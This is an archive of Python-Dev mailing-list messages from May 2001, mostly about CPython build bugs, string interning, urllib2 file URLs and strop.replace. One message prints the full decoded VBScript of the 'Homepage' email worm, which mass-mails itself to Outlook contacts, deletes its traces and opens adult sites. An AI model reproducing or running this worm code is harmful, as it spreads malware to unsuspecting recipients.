Skip From mwh at python.net Wed May 9 00:27:59 2001 From: mwh at python.net (Michael Hudson) Date: 08 May 2001 23:27:59 +0100 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: "Fred L. Drake, Jr."'s message of "Tue, 8 May 2001 10:45:18 -0400 (EDT)" References: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com> Message-ID: "Fred L. Drake, Jr." writes: > Michael Hudson writes: > > If you don't include termio.h the build breaks on alpha/OSF1. This > > sounds to me like OSF1's headers are broken (you can't include > > sys/ioctl.h without including termio.h first, it seems, or you get > > complaints about struct termio being undefined). So I'd suggest > > > > +#ifdef __osf__ > > #include <termio.h> > > +#endif > > > > and then see if the build breaks anywhere else (I love unix). > > Does it make more sense to do this or to test for termio.h in > configure? If you're asking *me*, I have no idea. I'd hope that no system would be as broken as osf1 is in this regard, but then I'd have hoped that osf1 wasn't this broken too... I guess the test in configure is "safer" in some sense. Getting this perfectly right would probably require more autoconf hackery than one can possibly imagine... ncurses generates an awk script from ./configure that is then run to produce term.h, but I'm not sure that all of that is devoted to including the right headers. can-we-just-have-TERMIOS-back?-ly y'rs M. -- Good? Bad? Strap him into the IETF-approved witch-dunking apparatus immediately! -- NTK now, 21/07/2000 From tim.one at home.com Wed May 9 08:48:12 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 02:48:12 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <20010508133638.Z16486@xs4all.nl> Message-ID: [Tim] > Given the new dict iterators in 2.2, there's an easier fast way > that doesn't mutate the dict even under the covers: > > def arb(dict): > if dict: > return dict.iteritems().next() > raise KeyError("arb passed an empty dict") [Thomas Wouters] > You probably want: > > arb = dict.iteritems().next > > so that you don't keep on returning the same key,value pair. No, I would not want that. If "arbitrary" suffices, then by defn. *any* element is "good enough". If it's not good enough to get the same one back every time, then I want a stronger guarantee about what arb() returns than the inexplicable behavior of repeated calls to dict.iteritems().next in the presence of dict mutation. But as I've said several times before, I'm still asking for an algorithm where arb() is actually useful (as opposed to .popitem(), which is dead easy to explain in the presence of mutation; your version of arb() can, e.g., return a given entry more than once, may skip entries, and may raise StopIteration with unexamined entries remaining in the dict). not-inclined-to-accept-shallow-comfort-at-the-cost-of-deep-confusion-ly y'rs - tim From tim.one at home.com Wed May 9 09:42:00 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 03:42:00 -0400 Subject: [Python-Dev] gcc barfs on recent stringobject changes... In-Reply-To: <200105090552.NAA08038@erebus.per.dem.csiro.au> Message-ID: [Mark Favas] > Changes in the last few hours (hi Tim!) Hi Mark! Sorry about that! > to stringobject compile (I'd guess) on MS You guess right -- and under two flavors of Windows. > (and on Compaq's Tru64 compiler), Figures. > but produce the following with gcc on Solaris and FreeBSD: > > gcc -c -g -O2 -Wall -Wstrict-prototypes -I.
-I./Include > -DHAVE_CONFIG_H -o Objects/stringobject.o Objects/stringobject.c > Objects/stringobject.c: In function `PyString_FromStringAndSize': > Objects/stringobject.c:76: invalid lvalue in unary `&' > Objects/stringobject.c:80: invalid lvalue in unary `&' > Objects/stringobject.c: In function `PyString_FromString': > Objects/stringobject.c:130: invalid lvalue in unary `&' > Objects/stringobject.c:134: invalid lvalue in unary `&' > *** Error code 1 Fair enough: I tried to use a cast as an lvalue in those 4 places, all of the form: PyString_InternInPlace(&(PyObject *)op); where op is declared PyStringObject*. Strictly speaking, that ain't legal, but changing it to: PyObject *t = (PyObject *)op; PyString_InternInPlace(&t); is. You may wonder WTF the difference is. That's easy: the rewrite doesn't use a cast expression as an lvalue. sensible-or-not-it's-checked-in-so-please-try-again-ly y'rs - tim From jack at oratrix.nl Wed May 9 10:16:29 2001 From: jack at oratrix.nl (Jack Jansen) Date: Wed, 09 May 2001 10:16:29 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by , Tue, 8 May 2001 13:22:17 -0500 , <15096.14681.773554.729550@beluga.mojam.com> Message-ID: <20010509081630.84D8D303181@snelboot.oratrix.nl> > > Jack> It's actually 830 files. ... 120 .c/.h files ... > > How many of those 120 files are variants of existing source files that (in > theory) could be merged with their mainline counterparts? None (unless you would count macmodule.c as a variant of posixmodule.c). I think macmain.c started out as a clone of pythonmain.c, but I think they're too different to merge (but I'll have a look). Hmm, now that I think of it macmodule and posixmodule could possibly be merged.
It's fun to see how much statistics I gather about MacPython in just a few days:-) -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From tim.one at home.com Wed May 9 10:20:12 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 04:20:12 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: <20010508070501.A25794@glacier.fnational.com> Message-ID: [Neil Schemenauer] > Shouldn't the entry in the __future__ file be: > > nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0)) > > or am I misunderstanding something? Until nested_scopes *is* the rule, the Mandatory Release field is just a guess about the future. Changing it to (2, 2, 0, "alpha", 0) right *now* would be wrong, since it would change it from a guess about the future to a false statement about the present. It must be changed when nested_scopes become mandatory; it needn't be changed before then (unless we delay making them mandatory beyond 2.2 final), although if somebody thinks they have a good use for moving the guess up, fine, just so long as they don't move the guess to or before 2.2a0. From thomas at xs4all.net Wed May 9 10:58:50 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 9 May 2001 10:58:50 +0200 Subject: [Python-Dev] Crashes w/ CVS tree Message-ID: <20010509105850.F16486@xs4all.nl> I'm getting a crash with Python compiled from a freshly updated CVS tree, even when running just './python'. It crashes during the loading of os.pyc. It doesn't crash if I start python with -S, and it doesn't crash if I remove *.pyc first: centurion:~/python/python-2.2/dist/src/linux> ./python Python 2.2a0 (#4, May 9 2001, 09:52:29) [GCC 2.95.4 20010506 (Debian prerelease)] on linux2 Type "copyright", "credits" or "license" for more information. 
>>> centurion:~/python/python-2.2/dist/src/linux> ./python Segmentation fault If I remove os.pyc only, I get the enlightening: Fatal Python error: PyString_InternInPlace: strings only please! Abort (core dumped) I would blame Tim, except that when examining the corefile I found some pointers to other causes. The 'original' crash occurs because cmp_outcome() is passed an invalid PyObject, with most of its function slots pointing to the middle of the glibc-internal '__morecore()' function. Examining the stack off of which the invalid item was popped reveals that the next-to-last item is an iterator. So maybe I should blame Guido instead, either for the iterator or for rich comparisons ;) From thomas at xs4all.net Wed May 9 11:14:32 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 9 May 2001 11:14:32 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects stringobject.c,2.111,2.112 In-Reply-To: ; from tim_one@users.sourceforge.net on Wed, May 09, 2001 at 01:43:23AM -0700 References: <20010509105850.F16486@xs4all.nl> Message-ID: <20010509111432.G16486@xs4all.nl> On Wed, May 09, 2001 at 01:43:23AM -0700, Tim Peters wrote: > Update of /cvsroot/python/python/dist/src/Objects > In directory usw-pr-cvs1:/tmp/cvs-serv10106/python/dist/src/Objects > > Modified Files: > stringobject.c > Log Message: > Sheesh -- repair the dodge around "cast isn't an lvalue" complaints to > restore correct semantics. This apparently fixed my problem: On Wed, May 09, 2001 at 10:58:50AM +0200, Thomas Wouters wrote: > > I'm getting a crash with Python compiled from a freshly updated CVS tree, > even when running just './python'. It crashes during the loading of os.pyc. > It doesn't crash if I start python with -S, and it doesn't crash if I remove > *.pyc first: That ought to teach me to spend my morning doing something fun -- it turned out to be useless :-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread!
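The crash above is consistent with how the first workaround quoted earlier in this thread fails. `PyString_InternInPlace()` may swap the object its argument points to, so copying `op` into a temporary `t` and never copying `t` back can leave `op` pointing at a string that has already been released. That reading is an inference from the log messages; the checkin text does not spell it out. Python-level code faces the same rule: interning (`intern()` in 2.x, `sys.intern()` in Python 3) hands back the canonical object, and the caller has to keep that object. A minimal sketch, assuming Python 3; `build_key` is a hypothetical helper:

```python
import sys

def build_key(parts):
    """Hypothetical helper: builds a string at runtime (not a compile-time constant)."""
    return "".join(parts)

# sys.intern() returns the canonical copy. Keep the return value, just as
# the C caller must keep the pointer written back through &t.
first = sys.intern(build_key(["spam", "_", "eggs"]))
second = sys.intern(build_key(["spam", "_", "eggs"]))

# Both names now refer to the same interned object, so an identity check is valid.
print(first is second)  # True
```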
From tim.one at home.com Wed May 9 11:29:31 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 05:29:31 -0400 Subject: [Python-Dev] Crashes w/ CVS tree In-Reply-To: <20010509105850.F16486@xs4all.nl> Message-ID: [Thomas Wouters] > I'm getting a crash with Python compiled from a freshly updated CVS > tree, even when running just './python'. I did too, for a little while, but it's gone away. > ... > Fatal Python error: PyString_InternInPlace: strings only please! > Abort (core dumped) > > I would blame Tim, I would too. Please update, and if stringobject.c changes, try again. I'm sure this is my fault, but I'm too sleepy to figure out why, and I did change *something* at random that appeared to make it go away. it's-all-gcc's-fault-ly y'rs - tim From Greg.Wilson at baltimore.com Wed May 9 17:49:29 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Wed, 9 May 2001 11:49:29 -0400 Subject: [Python-Dev] Homepage Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Hi! You've got to see this page! It's really cool ;O) -------------- next part -------------- A non-text attachment was scrubbed... Name: homepage.HTML.vbs Type: application/octet-stream Size: 2419 bytes Desc: not available URL: From guido at digicool.com Wed May 9 19:08:22 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 12:08:22 -0500 Subject: [Python-Dev] Homepage In-Reply-To: Your message of "Wed, 09 May 2001 11:49:29 -0400." <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Message-ID: <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Greg Wilson's computer was infected by a virus which got propagated to python-dev. Do NOT open the attachment!
--Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at pythonware.com Wed May 9 18:12:00 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Wed, 9 May 2001 18:12:00 +0200 Subject: [Python-Dev] Homepage References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> Message-ID: <00fa01c0d8a2$c8d72b60$e46940d5@hagrid> Greg's mail program wrote: > Hi! > > You've got to see this page! It's really cool ;O) > Content-Type: application/octet-stream; > name="homepage.HTML.vbs" > Content-Transfer-Encoding: quoted-printable > Content-Disposition: attachment; > filename="homepage.HTML.vbs" when will we see the first "homepage.HTML.py" virus? Cheers /F From esr at thyrsus.com Wed May 9 18:20:24 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 9 May 2001 12:20:24 -0400 Subject: [Python-Dev] Homepage In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 12:08:22PM -0500 References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: <20010509122024.A416@thyrsus.com> Guido van Rossum : > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Some of us -- heh, heh -- aren't vulnerable to attachment trojans. I could almost (not quite, but almost) love the crackers and script kiddiez of the world for what they're doing to Microsoft... -- Eric S. Raymond We shall not cease from exploration, and the end of all our exploring will be to arrive where we started and know the place for the first time. -- T.S. 
Eliot From fdrake at cj42289-a.reston1.va.home.com Wed May 9 18:21:27 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 9 May 2001 12:21:27 -0400 (EDT) Subject: [Python-Dev] [maintenance doc updates] Message-ID: <20010509162127.52B6228946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/maint-docs/ Incremental update of the maintenance branch (for Python 2.1.1). From barry at digicool.com Wed May 9 18:23:26 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 9 May 2001 12:23:26 -0400 Subject: [Python-Dev] Homepage References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: <15097.28414.354061.170478@anthem.wooz.org> >>>>> "GvR" == Guido van Rossum writes: GvR> Greg Wilson's computer was infected by a virus which got GvR> propagated to python-dev. Do NOT open the attachment! Darn, and I was just finishing up the vbs.el script so my XEmacs/VM reader could open it. share-the-pain-share-the-fun-ly y'rs, -Barry From fdrake at cj42289-a.reston1.va.home.com Wed May 9 18:47:27 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 9 May 2001 12:47:27 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010509164727.1594428946@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update of the development branch (for Python 2.2). From pedroni at inf.ethz.ch Wed May 9 19:12:20 2001 From: pedroni at inf.ethz.ch (Samuele Pedroni) Date: Wed, 9 May 2001 19:12:20 +0200 (MET DST) Subject: [Python-Dev] Homepage Message-ID: <200105091712.TAA05172@core.inf.ethz.ch> Hi. [GvR] > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! 
Here's the beast ("decrypted" and in a cage): ("decrypted" and in a cage): (we got it also on the old jpython-interest) MS has really increased computer usability, when I was younger (and I'm not that old) one bad guy had to use assembler to cause some damage, now thanks to MS, that don't cares much about security but likely a lot about self-confindence, everybody can feel very clever and proud writing such things ... and spamming the whole internet. On Error Resume Next Set WS = CreateObject("WScript.Shell") Set FSO= Createobject("scripting.filesystemobject") Folder=FSO.GetSpecialFolder(2) Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1) Do While InF.AtEndOfStream<>True ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf Loop Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vb$",2,true) OutF.write ScriptBuffer OutF.close Set FSO=Nothing If WS.regread ("HKCU\software\An\mailed") <> "1" then Mailit() End If Set s=CreateObject("Outlook.Application") Set t=s.GetNameSpace("MAPI") Set u=t.GetDefaultFolder(6) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).close u.Items.Item(i).delete End If Next Set u=t.GetDefaultFolder(3) For i=1 to u.items.count If u.Items.Item(i).subject="Homepage" Then u.Items.Item(i).delete End If Next Randomize r=Int((4*Rnd)+1) If r=1 then WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm") elseif r=2 Then WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm") elseif r=3 Then WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm") ElseIf r=4 Then WS.Run("http://sheila.issexy.tv/1.htm") End If Function Mailit() On Error Resume Next Set Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then Set Mapi=Outlook.GetNameSpace("MAPI") Set Lists=Mapi.AddressLists For Each ListIndex In Lists If ListIndex.AddressEntries.Count <> 0 Then ContactCount = ListIndex.AddressEntries.Count For Count= 1 To ContactCount Set Mail = Outlook.CreateItem(0) Set Contact = ListIndex.AddressEntries(Count) Mail.To = 
Contact.Address Mail.Subject = "Homepage" Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf Set Attachment=Mail.Attachments Attachment.Add Folder & "\homepage.HTML.vb$" Mail.DeleteAfterSubmit = True If Mail.To <> "" Then Mail.Send WS.regwrite "HKCU\software\An\mailed", "1" End If Next End If Next End if End Function PS: the "decryption" was done in python ;) From tim.one at home.com Wed May 9 19:47:22 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 13:47:22 -0400 Subject: [Python-Dev] Homepage In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Note that the same virus went out under the name of John G. Michopoulos on the JPython (not Jython!) mailing list. Here's detailed info on the virus (incl. simple removal instructions if you got bit): http://www.symantec.com/avcenter/venc/data/vbs.vbswg2.d at mm.html Doesn't appear to be worse than a nuisance. Anyone who has used Windows Update within the last year and installed the "critical updates" it recommends should have gotten a popup box warning that the attachment was trying to access the Address Book, telling you it's probably a virus, and advising to accept the "No, don't allow this" default. you-can-make-it-foolproof-but-not-damnedfool-proof-ly y'rs - tim From Greg.Wilson at baltimore.com Wed May 9 20:50:25 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Wed, 9 May 2001 14:50:25 -0400 Subject: [Python-Dev] apology Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B690@nsamcanms1.ca.baltimore.com> My apologies to all --- yes, my machine was hit by a virus that flooded the known universe with email. 
Sorry for any grief it has caused anyone, Greg From tim.one at home.com Wed May 9 21:30:41 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 15:30:41 -0400 Subject: [Python-Dev] test_urllib2 fails on Win98SE Message-ID: test_urllib2 takes > 30 seconds, then fails: C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py Traceback (most recent call last): File "../lib/test/test_urllib2.py", line 15, in ? f = urllib2.urlopen(file_url) File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen return _opener.open(url, data) File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open '_open', req) File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain result = func(*args) File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open return self.open_local_file(req) File "c:\code\python\dist\src\lib\urllib2.py", line 923, in open_local_file if not host or \ socket.error: host not found The URL it's passing is file://c:\code\python\dist\src\lib\urllib2.pyc If I change test_urllib2's file_url = "file://%s" % urllib2.__file__ to (adding another slash) file_url = "file:///%s" % urllib2.__file__ then it fails like this instead, but very quickly: C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py Traceback (most recent call last): File "../lib/test/test_urllib2.py", line 15, in ?
f = urllib2.urlopen(file_url) File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen return _opener.open(url, data) File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open '_open', req) File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain result = func(*args) File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open return self.open_local_file(req) File "c:\code\python\dist\src\lib\urllib2.py", line 925, in open_local_file return addinfourl(open(url2pathname(file), 'rb'), IOError: [Errno 2] No such file or directory: '\\c:\\code\\python\\dist\\src\\lib\\urllib2.pyc' Here's what I know about URLs: . Here's what I know about file URLs: . Here's what I know about file URLs on Windows: . If I type the original file://c:\code\python\dist\src\lib\urllib2.pyc into IE's address bar, it actually *executes* urllib2. From mwh at python.net Wed May 9 21:50:34 2001 From: mwh at python.net (Michael Hudson) Date: 09 May 2001 20:50:34 +0100 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 In-Reply-To: "Fred L. Drake"'s message of "Mon, 07 May 2001 10:55:37 -0700" References: Message-ID: "Fred L. Drake" writes: > ! fd = PyObject_AsFileDescriptor(obj); > ! if (fd == -1) { > ! if (PyInt_Check(obj)) { ^^^^^^^^^^^^^^^^ this is a bit pointless. I admit ->> termios.tcgetattr(-2) Traceback (most recent call last): File "<stdin>", line 1, in ? TypeError: tcgetattr, arg 1: can't extract file descriptor from "int" is a bit confusing, but I'm not sure ->> termios.tcgetattr(-2) Traceback (most recent call last): File "<stdin>", line 1, in ? error: (9, 'Bad file descriptor') is any better than: ->> termios.tcgetattr(-2) Traceback (most recent call last): File "<stdin>", line 1, in ?
ValueError: file descriptor cannot be a negative integer (-2) which is what you get after applying this patch: Index: Modules/termios.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Modules/termios.c,v retrieving revision 2.26 diff -c -r2.26 termios.c *** Modules/termios.c 2001/05/09 17:53:06 2.26 --- Modules/termios.c 2001/05/09 19:49:52 *************** *** 37,43 **** fd = PyObject_AsFileDescriptor(obj); if (fd == -1) { if (PyInt_Check(obj)) { ! fd = PyInt_AS_LONG(obj); } else { char* tname; --- 37,43 ---- fd = PyObject_AsFileDescriptor(obj); if (fd == -1) { if (PyInt_Check(obj)) { ! return 0; } else { char* tname; Cheers, M. From fdrake at acm.org Wed May 9 22:09:09 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 9 May 2001 16:09:09 -0400 (EDT) Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 In-Reply-To: References: Message-ID: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com> Michael Hudson writes: > this is a bit pointless. You're right! (Hey, it was your patch. ;) I'm checking in a different patch -- essentially, PyObject_AsFileDescriptor() does the right thing, and we don't ever need to second guess it. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From mwh at python.net Wed May 9 22:13:46 2001 From: mwh at python.net (Michael Hudson) Date: 09 May 2001 21:13:46 +0100 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 02 May 2001 21:55:25 +0200" References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > I've attached the patch. 
Due to a small reorganisation the patch is > a little longer -- symmetry has its price at C level too ;-) I may be being dense, but can you explain what's going on here: ->> u'\u00e3'.encode('latin-1') '\xe3' ->> u'\u00e3'.encode("latin-1").decode("latin-1") Traceback (most recent call last): File "<stdin>", line 1, in ? UnicodeError: ASCII encoding error: ordinal not in range(128) Can you come up with some other example I can use in tomorrow's python-dev summary? Cheers, M. -- Remember - if all you have is an axe, every problem looks like hours of fun. -- Frossie -- http://home.xnet.com/~raven/Sysadmin/ASR.Quotes.html From mwh at python.net Wed May 9 22:18:47 2001 From: mwh at python.net (Michael Hudson) Date: 09 May 2001 21:18:47 +0100 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 References: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com> Message-ID: "Fred L. Drake, Jr." writes: > Michael Hudson writes: > > this is a bit pointless. > > You're right! (Hey, it was your patch. ;) So it was! I must have uploaded a slightly stale version of the patch, because I noticed this when cvs update conflicted with what I had in Modules/termios.c... oops. > I'm checking in a different patch -- essentially, > PyObject_AsFileDescriptor() does the right thing, and we don't ever > need to second guess it. I was a bit concerned that the error should contain the function name. On reflection, I agree that the code is so much simpler that it's a win. Cheers, M. -- Java sucks. [...] Java on TV set top boxes will suck so hard it might well inhale people from off their sofa until their heads get wedged in the card slots. --- Jon Rabone, ucam.chat From paulp at ActiveState.com Wed May 9 22:48:38 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Wed, 09 May 2001 13:48:38 -0700 Subject: [Python-Dev] test_urllib2 fails on Win98SE References: Message-ID: <3AF9AD26.AC6DD323@ActiveState.com> Tim Peters wrote: > >...
> > Here's what I know about file URLs on Windows: . We constantly run into these problems with Komodo. The long and short is that file URL handling on Windows is totally different than on Unix and platform-specific code is probably appropriate. Here's what I know: IE treats the following equivalently: c:\temp\diff.txt file:c:\temp\diff.txt file:/c:\temp\diff.txt file://c:\temp\diff.txt file:///c:\temp\diff.txt file:///////////////////////////////c:\temp\diff.txt You can also reverse backslashes to slashes and slashes to backslashes if you like. Interestingly, though, UNC paths seem to work okay (no matter how you do the slashes and backslashes): file://americano\home\paulp\foo.html UNC paths seem to only allow two leading slashes/backslashes. Truly this is a new level of "be liberal in what you accept". The algorithm is probably something like: 1. normalize to forward slashes. 2. Remove "file:". 3. What you have left should be of the form: //machine/path or (/*)x:/path Where x is the drive letter. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From fredrik at effbot.org Thu May 10 01:19:40 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Thu, 10 May 2001 01:19:40 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <05e001c0d8de$87fcb9c0$e46940d5@hagrid> tim wrote: > Modified Files: > stropmodule.c > Log Message: > SF bug #422088: [OSF1 alpha] string.replace(). > Platform blew up on "123".replace("123", ""). Michael Hudson pinned the > blame on platform malloc(0) returning NULL. any reason why the #ifdef MALLOC_ZERO_RETURNS_NULL macro (in pyport.h) isn't set / doesn't take care of this? (and is it just me, or does the strop.replace function allocate a buffer, copy the result to that buffer, only to copy it into a string and throw the buffer away? 
no wonder u"".replace() is 30% faster than "".replace() ;-) Cheers /F From tim at digicool.com Thu May 10 01:39:08 2001 From: tim at digicool.com (Tim Peters) Date: Wed, 9 May 2001 19:39:08 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <05e001c0d8de$87fcb9c0$e46940d5@hagrid> Message-ID: [Fredrik Lundh] > any reason why the > > #ifdef MALLOC_ZERO_RETURNS_NULL > > macro (in pyport.h) isn't set / doesn't take care of this? The code uses PyMem_MALLOC, which after a chain of umpteen #defines ends up being plain malloc. As Michael noted in the bug report, it could have used PyMem_Malloc() instead and avoided the problem. But I chose not to do that, since special-casing a result of 0 was more efficient for reasons other than malloc. However: > (and is it just me, or does the strop.replace function allocate > a buffer, copy the result to that buffer, only to copy it into a > string and throw the buffer away? Yes. And I'm returning something now that mustn't be free()'ed when the result length is 0. Will fix. > no wonder u"".replace() is 30% faster than "".replace() ;-) For a given number of characters or bytes? From tim.one at home.com Thu May 10 01:46:13 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 19:46:13 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Message-ID: Oh, fuck. Somebody remind me why we have both stropmodule.c and stringobject.c? These bugs exist in both. From mike.mellor at tbe.com Thu May 10 02:16:28 2001 From: mike.mellor at tbe.com (mike.mellor at tbe.com) Date: Thu, 10 May 2001 00:16:28 -0000 Subject: [Python-Dev] CygWin and Tkinter Message-ID: <9dcmks+6aqf@eGroups.com> I am playing around with CygWin (which came with Python 2.1 installed). While I can run command line programs, Tkinter is not part of the package. TCL/TK is installed and I have been able to build TK GUI's.
How can I get Tkinter added to my Python package? Thanks. Mike From tim.one at home.com Thu May 10 02:47:52 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 20:47:52 -0400 Subject: [Python-Dev] Inconsistent string.replace() behavior Message-ID: test_strop.py contains this line: test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0) string_tests.py has this: test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0) IOW, the test suite insists that strop.replace('one!two!three!', '!', '@', 0) replace all matches but that string.replace('one!two!three!', '!', '@', 0) and 'one!two!three!'.replace('!', '@', 0) replace nothing. I've been thrashing like a madman trying to fix a common bug in both modules (in out-of-synch copies of mymemreplace), and every time I think I fix something "the other" module breaks. The above appears to be why. My opinion: the test_strop.py test is in error, and so was strop_replace() in stropmodule.c. I'm checking in changes accordingly, but won't mind getting yelled at if you disagree. From greg at cosc.canterbury.ac.nz Thu May 10 02:56:12 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 10 May 2001 12:56:12 +1200 (NZST) Subject: [Python-Dev] gcc barfs on recent stringobject changes... In-Reply-To: Message-ID: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz> Tim Peters : > PyObject *t = (PyObject *)op; > PyString_InternInPlace(&t); If you want to keep it all on one line, you could try PyString_InternInPlace((PyObject **)&op); Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc.
| greg at cosc.canterbury.ac.nz +--------------------------------------+ From guido at digicool.com Thu May 10 04:00:36 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:00:36 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 19:46:13 -0400." References: Message-ID: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> > Oh, fuck. Somebody remind me why we have both stropmodule.c and > stringobject.c? These bugs exist in both. In my mind, strop is obsolete. We keep it around because some losers like to import it directly, but it's basically dead, and except for a few functions, string.py doesn't use it any more. (The exceptions are maketrans, lowercase, uppercase, whitespace.) --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 10 04:01:20 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:01:20 -0500 Subject: [Python-Dev] CygWin and Tkinter In-Reply-To: Your message of "Thu, 10 May 2001 00:16:28 GMT." <9dcmks+6aqf@eGroups.com> References: <9dcmks+6aqf@eGroups.com> Message-ID: <200105100201.VAA00435@cj20424-a.reston1.va.home.com> > I am playing around with CygWin (which came with Python 2.1 > installed). While I can run command line programs, Tkinter is not > part of the package. TCL/TK is installed and I have been able to > build TK GUI's. How can I get Tkinter added to my Python package? > Thanks. Beats me. Ask whoever produces the CygWin port. --Guido van 